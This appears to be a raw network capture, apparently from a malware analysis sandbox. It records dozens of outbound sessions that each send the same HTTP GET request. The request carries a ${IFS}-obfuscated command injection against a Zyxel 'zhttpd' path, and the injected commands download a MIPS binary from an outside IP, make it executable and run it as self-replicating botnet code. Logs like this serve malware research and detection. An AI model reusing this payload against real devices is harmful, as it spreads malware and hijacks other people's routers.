                                        Jan 14, 2024 16:18:39.327109098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2731192.168.2.134193431.4.62.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327169895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2732192.168.2.133637643.23.16.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327212095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2733192.168.2.134797665.99.92.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327258110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2734192.168.2.135815043.203.213.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327312946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2735192.168.2.1334176122.186.130.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327349901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2736192.168.2.1343622172.170.51.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327411890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2737192.168.2.1348988189.137.13.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327467918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2738192.168.2.135535094.15.38.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327521086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2739192.168.2.1343364119.162.64.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327586889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2740192.168.2.133526871.115.71.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327649117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2741192.168.2.135038493.1.77.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327702999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2742192.168.2.135096035.109.227.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327770948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2743192.168.2.1347420131.107.150.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327807903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2744192.168.2.1338004104.63.95.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327908039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2745192.168.2.1359214149.134.156.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327963114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2746192.168.2.136022452.231.35.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327997923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2747192.168.2.1336500187.47.46.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328031063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2748192.168.2.135788671.191.231.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328114033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2749192.168.2.1335626152.181.84.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328178883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2750192.168.2.1338946135.6.62.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328198910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2751192.168.2.1335780126.151.83.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328274965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2752192.168.2.134313881.249.60.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328341007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2753192.168.2.1350362190.128.103.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328411102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2754192.168.2.135547657.222.31.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328466892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2755192.168.2.135265861.80.198.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328524113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2756192.168.2.135453431.36.15.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328568935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2757192.168.2.1338076170.88.198.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328625917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2758192.168.2.135943465.166.255.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328696966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2759192.168.2.134596469.248.211.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328737020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2760192.168.2.1353332107.104.77.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328787088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2761192.168.2.135423432.228.103.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328845024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2762192.168.2.1360820152.121.109.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328908920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2763192.168.2.135691045.113.24.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.328953981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2764192.168.2.135078450.46.194.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329015017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2765192.168.2.133431247.64.3.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329056978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2766192.168.2.1336336121.124.35.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329118967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2767192.168.2.1335286213.18.137.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329153061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2768192.168.2.134723218.19.89.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329243898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2769192.168.2.134710035.148.115.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329248905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2770192.168.2.1353326129.45.86.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329323053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2771192.168.2.133716685.203.119.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329389095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2772192.168.2.1350584204.19.54.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329449892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2773192.168.2.1345698182.169.7.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329514980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2774192.168.2.1356120119.174.27.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329567909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2775192.168.2.1335530148.232.164.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329619884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2776192.168.2.1357364125.189.205.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329658985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2777192.168.2.134105078.166.18.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329721928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2778192.168.2.1333022217.217.114.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329775095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2779192.168.2.135805823.115.170.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329834938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2780192.168.2.1347830193.150.6.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329895973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2781192.168.2.135693063.221.142.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329951048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2782192.168.2.1344054179.2.50.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.329989910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2783192.168.2.1343878136.41.129.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330039024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2784192.168.2.1348736143.47.224.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330075979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2785192.168.2.1340134153.14.136.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330116987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2786192.168.2.134272857.152.169.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330176115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2787192.168.2.1342210136.251.185.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330252886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2788192.168.2.133825012.63.124.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330312967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2789192.168.2.136046879.146.223.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330357075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2790192.168.2.1349786162.20.72.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330430031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2791192.168.2.1355178101.195.163.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330476999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2792192.168.2.1337546205.29.11.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330555916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2793192.168.2.1344640140.169.87.41443
                                        TimestampBytes transferredDirectionData
